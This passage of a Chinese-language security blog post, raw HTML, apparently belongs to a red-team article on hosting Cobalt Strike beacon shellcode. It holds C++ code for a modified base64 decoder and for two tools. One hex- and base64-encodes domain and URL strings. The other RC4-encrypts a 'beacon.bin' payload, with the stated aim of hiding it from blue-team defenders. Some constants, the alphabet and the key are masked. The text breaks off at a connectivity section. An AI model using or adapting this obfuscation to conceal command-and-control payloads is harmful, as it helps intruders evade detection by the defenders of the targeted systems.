class="code-snippet_outer">            char_array_3[<span class="code-snippet__number">0</span>] = (char_array_4[<span class="code-snippet__number">0</span>] &lt;&lt; <span class="code-snippet__number">2</span>) + ((char_array_4[<span class="code-snippet__number">1</span>] &amp; ***) &gt;&gt; <span class="code-snippet__number">4</span>);</span></code><code><span class="code-snippet_outer">            char_array_3[<span class="code-snippet__number">1</span>] = ((char_array_4[<span class="code-snippet__number">1</span>] &amp; ***) &lt;&lt; <span class="code-snippet__number">4</span>) + ((char_array_4[<span class="code-snippet__number">2</span>] &amp; <span class="code-snippet__number">0x3c</span>) &gt;&gt; <span class="code-snippet__number">2</span>);</span></code><code><span class="code-snippet_outer">            char_array_3[<span class="code-snippet__number">2</span>] = ((char_array_4[<span class="code-snippet__number">2</span>] &amp; ***) &lt;&lt; <span class="code-snippet__number">6</span>) + char_array_4[<span class="code-snippet__number">3</span>];</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">            <span class="code-snippet__keyword">for</span> (i = <span class="code-snippet__number">0</span>; (i &lt; <span class="code-snippet__number">3</span>); i++)</span></code><code><span class="code-snippet_outer">                ret += char_array_3[i];</span></code><code><span class="code-snippet_outer">            i = <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">        }</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">if</span> (i) {</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">for</span> (j = <span class="code-snippet__number">0</span>; j &lt; i; j++)</span></code><code><span class="code-snippet_outer">            char_array_4[j] = base64_chars.find(char_array_4[j]) &amp; <span class="code-snippet__number">0xff</span>;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">        char_array_3[<span class="code-snippet__number">0</span>] = (char_array_4[<span class="code-snippet__number">0</span>] &lt;&lt; <span class="code-snippet__number">2</span>) + ((char_array_4[<span class="code-snippet__number">1</span>] &amp; ***) &gt;&gt; <span class="code-snippet__number">4</span>);</span></code><code><span class="code-snippet_outer">        char_array_3[<span class="code-snippet__number">1</span>] = ((char_array_4[<span class="code-snippet__number">1</span>] &amp; ***) &lt;&lt; <span class="code-snippet__number">4</span>) + ((char_array_4[<span class="code-snippet__number">2</span>] &amp; ***) &gt;&gt; <span class="code-snippet__number">2</span>);</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">for</span> (j = <span class="code-snippet__number">0</span>; (j &lt; i - <span class="code-snippet__number">1</span>); j++) ret += char_array_3[j];</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">return</span> ret;</span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><br/></span></code></pre></section><p style="margin-left: 0pt;text-indent: 0pt;font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:uaf89dfda;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;"></span></span></p><p style="margin-left: 0pt;text-indent: 0pt;font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:uce599474;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">这样一来对大多数蓝队成员来说，即使知道了域名且访问到了加密的beacon shellcode，第一眼看上去也是base64，但解码后会发现什么也不是。到了这一步已经足以劝退绝大部分人了。而在这个demo中，对于域名和URL path就没有使用加密算法，只是做了hex编码+魔改base64的组合，如下图。</span></span><span style="mso-bookmark:uce599474;"><span style="mso-bookmark:LFtOq;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.20880913539967375" style="width:601.8091430664062px;height:127.54000091552734px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=6d51f13e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzeEkaD2z3qoBlGGSfuHdXeKBsIicsmG0m2W3ibUhQwN9BGvfwqKKEicIO6w%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:LFtOq;"></span><span style="mso-bookmark:uce599474;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">当然如果DIY的话也可以自己组合或者使用其它加密方式，这个demo只是提供一个参考思路。但这里要注意一点，即魔改的base64是不支持URL-Safe的版本，只能编码可见字符，遇到空字节会被截断，因此</span></span><span style="mso-bookmark:uce599474;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:bold;font-style:normal;text-underline:single;text-decoration:underline;">不能用来直接编码二进制数据！</span></span><span style="mso-bookmark:uce599474;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">对应解密算法写了两个加密脚本，在下面贴出来。由于加密只有在需要托管beacon shellcode的时候才需要做，也不需要频繁使用，所以没有必要做成独立的工具。</span></span><span style="mso-bookmark:uce599474;"><span style="font-family:Calibri;"></span></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cpp"><code><span class="code-snippet_outer"><span class="code-snippet__comment">// HEX+B64_EncodeString.cpp</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__meta">#<span class="code-snippet__meta-keyword">include</span> <span class="code-snippet__meta-string">&lt;iostream&gt;</span></span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__meta">#<span class="code-snippet__meta-keyword">include</span> <span class="code-snippet__meta-string">&lt;string&gt;</span></span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__meta">#<span class="code-snippet__meta-keyword">include</span> <span class="code-snippet__meta-string">&lt;sstream&gt;</span></span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__meta">#<span class="code-snippet__meta-keyword">include</span> <span class="code-snippet__meta-string">&lt;iomanip&gt;</span></span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__meta">#<span class="code-snippet__meta-keyword">include</span> <span class="code-snippet__meta-string">&lt;vector&gt;</span></span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">std</span>::<span class="code-snippet__function"><span class="code-snippet__built_in">string</span> <span class="code-snippet__title">base64_encode</span><span class="code-snippet__params">(<span class="code-snippet__keyword">const</span> <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">string</span>&amp; input)</span> </span>{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">const</span> <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">string</span> base64Chars = <span class="code-snippet__string">&#34;**********************************************&#34;</span>;<span class="code-snippet__comment">//自己可以改</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">string</span> encodedString;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">size_t</span> inputSize = input.size();</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">size_t</span> i = <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">    </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">while</span> (i &lt; inputSize) {</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span> char1 = input[i++];</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span> char2 = (i &lt; inputSize) ? input[i++] : <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span> char3 = (i &lt; inputSize) ? input[i++] : <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">        </span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span> b1 = char1 &gt;&gt; <span class="code-snippet__number">2</span>;</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span> b2 = ((char1 &amp; ***) &lt;&lt; <span class="code-snippet__number">4</span>) | (char2 &gt;&gt; <span class="code-snippet__number">4</span>);</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span> b3 = ((char2 &amp; ***) &lt;&lt; <span class="code-snippet__number">2</span>) | (char3 &gt;&gt; <span class="code-snippet__number">6</span>);</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span> b4 = char3 &amp; ***;</span></code><code><span class="code-snippet_outer">        </span></code><code><span class="code-snippet_outer">        encodedString += base64Chars[b1];</span></code><code><span class="code-snippet_outer">        encodedString += base64Chars[b2];</span></code><code><span class="code-snippet_outer">        encodedString += (char2 ? base64Chars[b3] : <span class="code-snippet__string">&#39;=&#39;</span>);</span></code><code><span class="code-snippet_outer">        encodedString += (char3 ? base64Chars[b4] : <span class="code-snippet__string">&#39;=&#39;</span>);</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">    </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">return</span> encodedString;</span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">std</span>::<span class="code-snippet__function"><span class="code-snippet__built_in">string</span> <span class="code-snippet__title">hex_encode</span><span class="code-snippet__params">(<span class="code-snippet__keyword">const</span> <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">vector</span>&lt;<span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span>&gt;&amp; input)</span> </span>{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">stringstream</span> encoded_stream;</span></code><code><span class="code-snippet_outer">    encoded_stream &lt;&lt; <span class="code-snippet__built_in">std</span>::hex &lt;&lt; <span class="code-snippet__built_in">std</span>::setfill(<span class="code-snippet__string">&#39;0&#39;</span>);</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">for</span> (<span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span> c : input) {</span></code><code><span class="code-snippet_outer">        encoded_stream &lt;&lt; <span class="code-snippet__built_in">std</span>::setw(<span class="code-snippet__number">2</span>) &lt;&lt; <span class="code-snippet__keyword">static_cast</span>&lt;<span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">int</span>&gt;(c);</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">return</span> encoded_stream.str();</span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">vector</span>&lt;<span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span>&gt; hex_decode(<span class="code-snippet__keyword">const</span> <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">string</span>&amp; input) {</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">vector</span>&lt;<span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span>&gt; decoded_data;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">for</span> (<span class="code-snippet__keyword">size_t</span> i = <span class="code-snippet__number">0</span>; i &lt; input.length(); i += <span class="code-snippet__number">2</span>) {</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">string</span> byte_str = input.substr(i, <span class="code-snippet__number">2</span>);</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">int</span> byte_value = <span class="code-snippet__built_in">std</span>::stoul(byte_str, <span class="code-snippet__literal">nullptr</span>, <span class="code-snippet__number">16</span>);</span></code><code><span class="code-snippet_outer">        decoded_data.push_back(<span class="code-snippet__keyword">static_cast</span>&lt;<span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span>&gt;(byte_value));</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">return</span> decoded_data;</span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__function"><span class="code-snippet__keyword">int</span> <span class="code-snippet__title">main</span><span class="code-snippet__params">()</span> </span>{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span> byteArray[] = {<span class="code-snippet__string">&#34;************************&#34;</span>};</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">vector</span>&lt;<span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span>&gt; binaryArray;</span></code><code><span class="code-snippet_outer">    binaryArray.assign(byteArray, byteArray + <span class="code-snippet__keyword">sizeof</span>(byteArray) / <span class="code-snippet__keyword">sizeof</span>(byteArray[<span class="code-snippet__number">0</span>]));</span></code><code><span class="code-snippet_outer">    </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">cout</span> &lt;&lt; <span class="code-snippet__string">&#34;HEX encoded string: &#34;</span> &lt;&lt; hex_encode(binaryArray) &lt;&lt; <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">endl</span>;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">cout</span> &lt;&lt; <span class="code-snippet__string">&#34;B64 encoded agian: &#34;</span> &lt;&lt; base64_encode(hex_encode(binaryArray)) &lt;&lt; <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">endl</span>;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">return</span> <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment">// RC4+HEX+B64_EncryptFile.cpp</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__meta">#<span class="code-snippet__meta-keyword">include</span> <span class="code-snippet__meta-string">&lt;iostream&gt;</span></span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__meta">#<span class="code-snippet__meta-keyword">include</span> <span class="code-snippet__meta-string">&lt;fstream&gt;</span></span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__meta">#<span class="code-snippet__meta-keyword">include</span> <span class="code-snippet__meta-string">&lt;sstream&gt;</span></span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__meta">#<span class="code-snippet__meta-keyword">include</span> <span class="code-snippet__meta-string">&lt;string&gt;</span></span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__meta">#<span class="code-snippet__meta-keyword">include</span> <span class="code-snippet__meta-string">&lt;iomanip&gt;</span></span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__meta">#<span class="code-snippet__meta-keyword">include</span> <span class="code-snippet__meta-string">&lt;vector&gt;</span></span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">std</span>::<span class="code-snippet__function"><span class="code-snippet__built_in">string</span> <span class="code-snippet__title">base64_encode</span><span class="code-snippet__params">(<span class="code-snippet__keyword">const</span> <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">string</span>&amp; input)</span> </span>{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">const</span> <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">string</span> base64Chars = <span class="code-snippet__string">&#34;**********************************************&#34;</span>;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">string</span> encodedString;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">size_t</span> inputSize = input.size();</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">size_t</span> i = <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">    </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">while</span> (i &lt; inputSize) {</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span> char1 = input[i++];</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span> char2 = (i &lt; inputSize) ? input[i++] : <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span> char3 = (i &lt; inputSize) ? input[i++] : <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">        </span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span> b1 = char1 &gt;&gt; <span class="code-snippet__number">2</span>;</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span> b2 = ((char1 &amp; ***) &lt;&lt; <span class="code-snippet__number">4</span>) | (char2 &gt;&gt; <span class="code-snippet__number">4</span>);</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span> b3 = ((char2 &amp; ***) &lt;&lt; <span class="code-snippet__number">2</span>) | (char3 &gt;&gt; <span class="code-snippet__number">6</span>);</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span> b4 = char3 &amp; ***;</span></code><code><span class="code-snippet_outer">        </span></code><code><span class="code-snippet_outer">        encodedString += base64Chars[b1];</span></code><code><span class="code-snippet_outer">        encodedString += base64Chars[b2];</span></code><code><span class="code-snippet_outer">        encodedString += (char2 ? base64Chars[b3] : <span class="code-snippet__string">&#39;=&#39;</span>);</span></code><code><span class="code-snippet_outer">        encodedString += (char3 ? base64Chars[b4] : <span class="code-snippet__string">&#39;=&#39;</span>);</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">    </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">return</span> encodedString;</span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">std</span>::<span class="code-snippet__function"><span class="code-snippet__built_in">string</span> <span class="code-snippet__title">hex_encode</span><span class="code-snippet__params">(<span class="code-snippet__keyword">const</span> <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">string</span>&amp; input)</span> </span>{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">stringstream</span> encoded;</span></code><code><span class="code-snippet_outer">    encoded &lt;&lt; <span class="code-snippet__built_in">std</span>::hex &lt;&lt; <span class="code-snippet__built_in">std</span>::setfill(<span class="code-snippet__string">&#39;0&#39;</span>);</span></code><code><span class="code-snippet_outer">    </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">for</span> (<span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span> c : input) {</span></code><code><span class="code-snippet_outer">        encoded &lt;&lt; <span class="code-snippet__built_in">std</span>::setw(<span class="code-snippet__number">2</span>) &lt;&lt; <span class="code-snippet__keyword">static_cast</span>&lt;<span class="code-snippet__keyword">int</span>&gt;(c);</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">    </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">return</span> encoded.str();</span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">std</span>::<span class="code-snippet__function"><span class="code-snippet__built_in">string</span> <span class="code-snippet__title">rc4_encrypt_decrypt</span><span class="code-snippet__params">(<span class="code-snippet__keyword">const</span> <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">string</span>&amp; data, <span class="code-snippet__keyword">const</span> <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">string</span>&amp; key)</span> </span>{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">string</span> result;</span></code><code><span class="code-snippet_outer">    result.reserve(data.size());</span></code><code><span class="code-snippet_outer">    </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">vector</span>&lt;<span class="code-snippet__keyword">unsigned</span> <span class="code-snippet__keyword">char</span>&gt; state(***);</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">for</span> (<span class="code-snippet__keyword">int</span> i = <span class="code-snippet__number">0</span>; i &lt; ***; ++i) {</span></code><code><span class="code-snippet_outer">        state[i] = i;</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">    </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">int</span> j = <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">int</span> keyLength = key.size();</span></code><code><span class="code-snippet_outer">    </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">for</span> (<span class="code-snippet__keyword">int</span> i = <span class="code-snippet__number">0</span>; i &lt; ***; ++i) {</span></code><code><span class="code-snippet_outer">        j = (j + state[i] + key[i % keyLength]) % ***;</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__built_in">std</span>::swap(state[i], state[j]);</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">    </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">int</span> i = <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">    j = <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">    </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">for</span> (<span class="code-snippet__keyword">char</span> c : data) {</span></code><code><span class="code-snippet_outer">        i = (i + <span class="code-snippet__number">1</span>) % ***;</span></code><code><span class="code-snippet_outer">        j = (j + state[i]) % ***;</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__built_in">std</span>::swap(state[i], state[j]);</span></code><code><span class="code-snippet_outer">        result += c ^ state[(state[i] + state[j]) % ***];</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">    </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">return</span> result;</span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">std</span>::<span class="code-snippet__function"><span class="code-snippet__built_in">string</span> <span class="code-snippet__title">read_file</span><span class="code-snippet__params">(<span class="code-snippet__keyword">const</span> <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">string</span>&amp; filepath)</span> </span>{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::<span class="code-snippet__function">ifstream <span class="code-snippet__title">file</span><span class="code-snippet__params">(filepath, <span class="code-snippet__built_in">std</span>::ios::binary)</span></span>;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">if</span> (!file) {</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">return</span> <span class="code-snippet__string">&#34;&#34;</span>;</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">    </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">stringstream</span> buffer;</span></code><code><span class="code-snippet_outer">    buffer &lt;&lt; file.rdbuf();</span></code><code><span class="code-snippet_outer">    </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">return</span> buffer.str();</span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__function"><span class="code-snippet__keyword">int</span> <span class="code-snippet__title">main</span><span class="code-snippet__params">()</span> </span>{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">string</span> filename = <span class="code-snippet__string">&#34;/Users/hunter/Downloads/beacon.bin&#34;</span>;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">string</span> key = <span class="code-snippet__string">&#34;**********************************************&#34;</span>;<span class="code-snippet__comment">//自己可以改</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">string</span> enc_file = rc4_encrypt_decrypt(read_file(filename), key);</span></code><code><span class="code-snippet_outer">    </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">string</span> hex_string = hex_encode(enc_file);</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment">// std::cout &lt;&lt; &#34;Hex encoded content of file &#34; &lt;&lt; filename &lt;&lt; &#34;:&#34; &lt;&lt; std::endl;</span></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">cout</span> &lt;&lt; <span class="code-snippet__string">&#34;HEX encoded: &#34;</span> &lt;&lt; <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">endl</span>;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">cout</span> &lt;&lt; hex_string &lt;&lt; <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">endl</span>;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">cout</span> &lt;&lt; <span class="code-snippet__string">&#34;B64 encoded agian: &#34;</span> &lt;&lt; <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">endl</span>;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">cout</span> &lt;&lt; base64_encode(hex_string) &lt;&lt; <span class="code-snippet__built_in">std</span>::<span class="code-snippet__built_in">endl</span>;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">return</span> <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><br/></span></code></pre></section><p style="margin-left: 0pt;text-indent: 0pt;font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;line-height: 2em;margin-bottom: 8px;"><br/></p><p style="margin-left: 0pt;text-indent: 0pt;font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;"><strong style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;text-wrap: wrap;font-size: 20px;letter-spacing: 0.034em;"><span style="font-family: 宋体;">2.3 连通性保障</span>   </strong></span></span></p><p style="margin-left: 0pt;text-indent: 0pt;font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:j4Uuq;"></span><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">由于防守方无法判定是否为恶意流量</span></span><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">，</span></span><span style="mso-bookmark:ua58ccfe8;"><span 